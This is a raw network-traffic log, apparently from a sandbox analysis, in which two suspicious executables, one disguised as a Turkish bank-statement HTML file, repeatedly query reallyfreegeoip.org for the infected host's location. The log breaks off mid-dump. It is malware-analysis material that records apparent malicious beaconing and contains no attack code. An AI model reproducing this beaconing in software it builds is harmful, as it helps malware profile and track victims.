2024-12-10 13:07:43 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:44 UTC	881	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15386 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKrozdnHd87PKTXMS9e5oP%2BVQvwev2uiU51%2BZrme7Y3EXwOHawZBaMFRFE6pWIC0IKGY%2B6mXgnLSy3mBhAgQii5S5%2F1IAKMb%2F5kNkdQOx2e%2FKYG2Ng2BRnEoy5GvfTdPwSlz3IUh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75a78c7a728d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1830&rtt_var=697&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1595628&cwnd=234&unsent_bytes=0&cid=125ea4d0bfa3de36&ts=456&x=0"
2024-12-10 13:07:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49733	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:44 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:44 UTC	872	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15387 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6awO7j75RDSYDtLDrmwIASnaAYGFXRg2p1fWAiO%2Fx5dUjGBFI4yNrSWqO8Txcz7u284mXT7o6JN9ewE2OIWIRv2pbZOP49vEJtAqOFcghCy8SloRWZ2CX%2FOg4r8clbovBQAbLKfd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75aa6c260c7e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1496&rtt_var=572&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1893644&cwnd=77&unsent_bytes=0&cid=3d5dda46c28b76ab&ts=463&x=0"
2024-12-10 13:07:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49737	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:46 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:47 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15390 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHgJjvJzI6PcQavQX953G3z4GK1KVhVy0VYaCmxw%2FHM5YU56Hb0vBiRQfkcFXEIPBSQ1RdDljwKTfvpvdAnO6dF9b6FYMzQbbcAxzD2K9kuFo7Zd5Rmgb71SlYwt2HK%2BlI%2F6qvLh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75bafcbcc42c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1642&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1749550&cwnd=230&unsent_bytes=0&cid=a6840d3cf5453158&ts=470&x=0"
2024-12-10 13:07:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49739	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:47 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:47 UTC	879	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15390 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bj4IpH8QY%2ByABl2Rab%2FzzL9KRcjPqkLGlO5eg49v1Qd0tfDJalwKqRRC06wNeGeG%2FINsyEcS80NEgtyMqOUXOSORkk98CgNK0oNmfZZ4CDK%2B2Yu39MLiQ2fvmPpKqDsEuQE7bGMG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75bdfbf40f8f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1519&rtt_var=607&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1748502&cwnd=232&unsent_bytes=0&cid=8efa685b8afe61e6&ts=453&x=0"
2024-12-10 13:07:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49744	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:49 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:50 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15393 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5YIzaaC9AU1VCteM4nEq6sAT%2FfzOzZYk0rg4tw34787SCkm5cvbjOONYvho2M%2BRgdnLxOEIA%2BnF1Ma9te6zPI2XCm8yAzMSjVLwtwGx6Ja9kMkdT9ILcsbT1wP34Ge967F0hTPq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75ce6a604364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1588&rtt_var=671&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1542525&cwnd=206&unsent_bytes=0&cid=3f25bca0f77df452&ts=451&x=0"
2024-12-10 13:07:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49745	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:50 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:50 UTC	873	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15393 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8lHnE1YCKeSonp%2BmxljgbC3VQmhY5Z0v7fwOV8w8EK2VG7MOdOagk7D1vBGUr7pYH0bLWrtz23YhSdnKOhDVIVL%2BX8j0poKKEXyQlsSO0WaHHOzLXKSwV1XR4ldVLMCsa4gfc9e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75d14c586a59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1741&rtt_var=670&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1612368&cwnd=246&unsent_bytes=0&cid=653110a8df06ea9c&ts=457&x=0"
2024-12-10 13:07:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49748	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:52 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:53 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15396 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pC5REXBmbVyL0h0TwxB1zO8gY2dxASf9isdvJEYQpsfmqPQf9lR3jNq9Qy8T91amxGNnpsjn1Wn3DZ7dhO6jWhCNRkW8GoojCgPcIDaXso%2B%2F3qPJVutQ30hF%2FiIiNsjxokqcQK8l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75e1c9b50c8a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1489&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1907250&cwnd=108&unsent_bytes=0&cid=a12093386a5af5ae&ts=453&x=0"
2024-12-10 13:07:53 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49749	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:53 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:53 UTC	871	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15396 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFk7rvKJW3gQeW0BUpSrJgdjPz3SNK9BBPvd3C5kF1Jk66OxO8M1rlEB0Un9PtANqcWnrWCUzKenYdEtiMCvbxrPmMCTZG4Q6Umy0jKGKYQwSPygYMebMoWSz3r9%2Bj4VQN0boQaI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75e4ad6bc35a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1526&rtt_var=578&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1913499&cwnd=246&unsent_bytes=0&cid=e5f2cd784ff47b30&ts=451&x=0"
2024-12-10 13:07:53 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49753	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:56 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:56 UTC	877	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:56 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15399 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZuzAOxlVRxqGaXBp0n%2FVne2IbkdHovdzVui8tl9RgI9vQ9bMmwzP0pYMzeYmvUuv6ok2oIx10rwhCgbRAxuzDNmcVHIjjkBwpINgPVF%2FsWzV%2FCpegM%2BSojvGHb5audrj3k9WltO2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75f56b5919cf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2122&min_rtt=2120&rtt_var=799&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1365123&cwnd=252&unsent_bytes=0&cid=eef74fee0ee909b9&ts=461&x=0"
2024-12-10 13:07:56 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49754	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:56 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:57 UTC	877	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:56 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15399 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FFJ06LGwaheDXCc1SHVJwHNExHaJ3hK6SflQQCQFX8xiS1FQ7tv%2FNLc7aaTwaE3p6ai2g85crKF8ABZ5J4IEOQdS4tM3sq7TlM%2FWdTLEbUBM5RE1zD7Uz76UuTl%2FJNWeG2Y3wUy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75f82e3f43a7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1641&rtt_var=863&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1779402&cwnd=177&unsent_bytes=0&cid=6f239226e4670d7a&ts=466&x=0"
2024-12-10 13:07:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 